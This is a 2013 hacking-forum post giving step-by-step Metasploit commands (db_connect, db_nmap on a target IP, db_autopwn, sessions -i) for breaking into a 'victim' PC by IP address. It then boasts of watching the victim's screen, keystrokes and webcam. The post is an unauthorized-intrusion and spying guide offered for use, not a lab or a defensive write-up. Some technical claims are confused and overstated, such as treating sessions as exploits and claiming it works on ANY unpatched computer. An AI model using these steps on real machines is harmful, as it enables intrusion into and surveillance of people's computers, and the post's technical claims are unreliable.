MARATHI TEAM
Welcome on the Marathi Team Forum.
To take full advantage of everything offered by
our forum, please log in if you are already a
member or join our community if you're not
yet....


Join the forum, it's quick and easy

MARATHI TEAM
Welcome on the Marathi Team Forum.
To take full advantage of everything offered by
our forum, please log in if you are already a
member or join our community if you're not
yet....
MARATHI TEAM
Would you like to react to this message? Create an account in a few clicks or log in to continue.
Log in

I forgot my password

Latest topics
Top posting users this week
No user

Nimbuzz id Maker
freebuzz is my love :D

user name

password

captcha


[Hot] Hack your victum PC via IP address [Hot]

Go down

Heart [Hot] Hack your victum PC via IP address [Hot]

Post  Vampire_lady Fri Jan 04, 2013 12:00 am

Hello everybody! I am here to show you this
magical tool called Metasploit that allows you to
hack ANY unpatched computer with only it's
IP. Lets begin... 1.) First you need to download Metasploit. The
most up-to-date version is FREE at
metasploit.com. 2.) You need PostgrSQL for your database.
Download here: http:// www.postgresql.org/. Make sure you use all the defaults or Metasploit woun't work! 3.) Now lets get down to buisness... After
installing both tools, open up the PostgrSQL
admin gui (start -> all programs -> PostgreSQL
9.0 -> pgAdmin III). Then right-click on your
server (in the left hand box) and click connect.
Remember to keep this window open the whole time. You will also need the pass you
chose to use in step 5...
[Hot] Hack your victum PC via IP address [Hot] Pgadmin
4.) Time for some hacking! Go to start -> all
programs -> Metasploit Framework, and then
open the Metasploit gui. Let it load untill it look
like this:
[Hot] Hack your victum PC via IP address [Hot] Metasploit
5.)Now, in the window type: db_connect
postgres:ThePassYouChose@localhost:5432 The first time you do this you will see lots of
text flash buy. Don't wory, this is normal. 6.)Type db_host to make sure you are
connected correctally. 7.)Now type this: db_nmap 000.000.000.000 Make sure you put the ip of the computer you
are trying to hack in the place of
000.000.000.000... 7.) Now we get to the fun part; the automatic
exploitation. Just type db_autopwn -t -p -e -s -
b , watch the auto-exploitation start, go play
Halo for a while, and then come back... 8.) After the exploitation is done, type sessions
-l to see what the scanner found. If all went
well, you should see a list of exploits. 9.) Now we get to use the exploits to hack the
computer! If you will notice, all of the exploits
are numbered, and they all have obvious
names (i. e., reverseScreen_tcp). In order to use
an exploit, type this: sessions -i ExploitNumber __________________________________________________
_________ The features of Metasploit are mutch like a rat.
Once you get into someone's computer, you
can see their screen, controll their mouse, see
what they type, see them, etc. Happy hacking!

Vampire_lady
Member
Member

Posts : 56
Points : 168
Reputation : 6
Join date : 2013-01-02

Back to top Go down

Back to top

- Similar topics

 
Permissions in this forum:
You cannot reply to topics in this forum